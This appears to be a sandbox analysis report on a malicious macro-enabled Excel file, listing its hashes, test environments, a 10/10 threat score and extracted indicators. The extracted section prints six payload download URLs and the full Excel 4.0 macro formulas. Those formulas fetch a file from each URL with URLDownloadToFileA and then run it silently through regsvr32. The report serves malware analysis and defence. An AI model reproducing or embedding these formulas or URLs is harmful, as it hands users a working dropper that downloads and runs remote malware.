General
-
Target
395f28e820b7511df98bbf5fe1758e3624e0c9e11ad8005d51ee818e360e0347
-
Size
46KB
-
Sample
241111-vbnvaavnbq
-
MD5
0191641064fb537eb5bf246f01155f59
-
SHA1
6b5983fedfa2d69e9c0cbba17ab0975093de83b6
-
SHA256
395f28e820b7511df98bbf5fe1758e3624e0c9e11ad8005d51ee818e360e0347
-
SHA512
5c3b0587a598dd37f5bf22a8e499c3fcb4d815b9c78836c713b5ca2b181f455f199de81075c69df61ea6a91066e69b61e32cabd540f7569c9866a1bfd20feea2
-
SSDEEP
768:OEoTBvDOevZCwrvtWzdDTKufT9nz0LTyY1NiMZFYpvrLeci3cr+Uh0VU2ceI:ZolvDmtT5fTR4Lh1NisFYBc3cr+UqVUz
Behavioral task
behavioral1
Sample
395f28e820b7511df98bbf5fe1758e3624e0c9e11ad8005d51ee818e360e0347.xlsm
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
395f28e820b7511df98bbf5fe1758e3624e0c9e11ad8005d51ee818e360e0347.xlsm
Resource
win10v2004-20241007-en
Malware Config
Extracted
http://moveconnects.com/wp-admin/network/7T8g9DAohsL/
http://benzo-pl.com/wp-content/NVJU3gASPcyRDctfsM/
http://mentalpeaks.care/kymogram/ex1hhh/
https://melhoreseudia.club/assets/JbQzzZ7UBaXq7bB/
http://meca-global.com/okickb/Vm1FMsVcbL/
http://bizfedlacounty.org/wp-auth/GxsV/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://moveconnects.com/wp-admin/network/7T8g9DAohsL/","..\enu.ocx",0,0)
=IF('EFALGV'!D10<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://benzo-pl.com/wp-content/NVJU3gASPcyRDctfsM/","..\enu.ocx",0,0))
=IF('EFALGV'!D12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://mentalpeaks.care/kymogram/ex1hhh/","..\enu.ocx",0,0))
=IF('EFALGV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://melhoreseudia.club/assets/JbQzzZ7UBaXq7bB/","..\enu.ocx",0,0))
=IF('EFALGV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://meca-global.com/okickb/Vm1FMsVcbL/","..\enu.ocx",0,0))
=IF('EFALGV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bizfedlacounty.org/wp-auth/GxsV/","..\enu.ocx",0,0))
=IF('EFALGV'!D20<0,CLOSE(0),)
=EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\enu.ocx")
=RETURN()
Targets
Score
10/10
-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-